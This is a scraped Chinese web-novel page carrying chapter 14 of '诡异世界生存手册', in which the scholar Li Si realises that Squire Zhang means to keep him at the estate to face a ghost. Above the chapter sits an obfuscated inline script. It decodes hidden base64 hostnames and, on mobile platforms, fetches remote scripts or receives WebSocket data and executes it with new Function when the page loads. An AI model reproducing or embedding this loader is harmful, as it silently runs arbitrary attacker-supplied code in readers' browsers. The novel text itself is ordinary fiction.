宜小说

字:
关灯 护眼
宜小说 > 诡异世界生存手册 > 第十四章:初闻张家鬼
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十四章:初闻张家鬼

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
  说到这,张员外嗤笑了一声。
  “不知道贤侄有没有办法?”说到这,他把希冀的目光看向李思。
  李思脸上流露出为难的神色,叹声道:“如果叔父让我做学问我还行,但这降妖除魔的手段我哪里会啊。”
  “也对。”张员外点了点头,脸上流露出可惜的神色,似乎对李思的话极为认同一般。
  “叔父,对于这件事我也感到遗憾。只可惜我没有降妖除魔的手段,不然我一定为您斩了这鬼物。”李思脸上露出一副义愤填膺的神色,仿佛和鬼物有不共戴天之仇一般。
  张员外见李思如此,眼中流露一丝了然,看来这李先生果然如传言那般,是一个愤世嫉俗的人。一位君子般的人物,只是可惜不懂降妖除魔的手段,对自己也没有什么大用。
  不过,既然进了他张府,那想出去就难了,不管李思能不能降服这鬼物,他都要去降服。不能降服,那他就死在张府吧。
  而这个时候,李思却是放下碗筷,对着张员外拱了拱手道:“叔父,我吃饱了,等他日再来拜访您。也祝您早日找到人消灭那鬼物。”
  张员外听到李思这么说也是一愣,脸色逐渐冷了下来,把碗筷往桌上重重一放,寒声道:“可是我张某人对贤侄招待不周?”
  “自然没有。”李思连忙回道。
  “那为何要离去?”
  “其实我也觉得贵府环境特别好,吃食也好,可惜我与县中一些人家有约,今日申时要给幼童讲学。与人有约自然不得不去。”李思脸上流露出惋惜的神色,似乎他特别想留在张府一般。
  听到李思的话,张员外的脸色顿时缓和了下来:“此事简单,我让奴仆去县城里说一声,过几天再去也是一样的。再说以前贤侄不是说想借阅我府中的书籍吗?这次正是一个机会。”
  张员外朝一名奴仆招了招手,等到他走到近前吩咐道:“范福,你去通知一下。”
  “是,老爷。”那奴仆恭敬领命去了。
  李思见到这张员外的行为,心中咯噔一下,这老货果然就是不准备让自己走。这是死也要拉自己垫背啊。
  脑中也翻阅了下前身的记忆,心中一叹,前身还真找张府借过书。但是当时张府哪里看得上前身,不过是一个穷酸秀才罢了。直接把前身赶出了门。
  前身找张府借书也是没有办法的事情,毕竟现在这个世界是一个知识垄断的世界,书籍基本都在一些地主以及一些家族手中。
  平常一些人根本就没有机会接触书籍。这个时代也根本就没有印刷术,书基本都是手抄的。所以这也是李思前身为什么冒着被张府驱赶的屈辱的可能还是要求着借书的原因。
  这时候李思脑中划过一道闪电,突然想到一件事情,原主家并不富裕,为什么家中书房会有四五十本书呢?
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师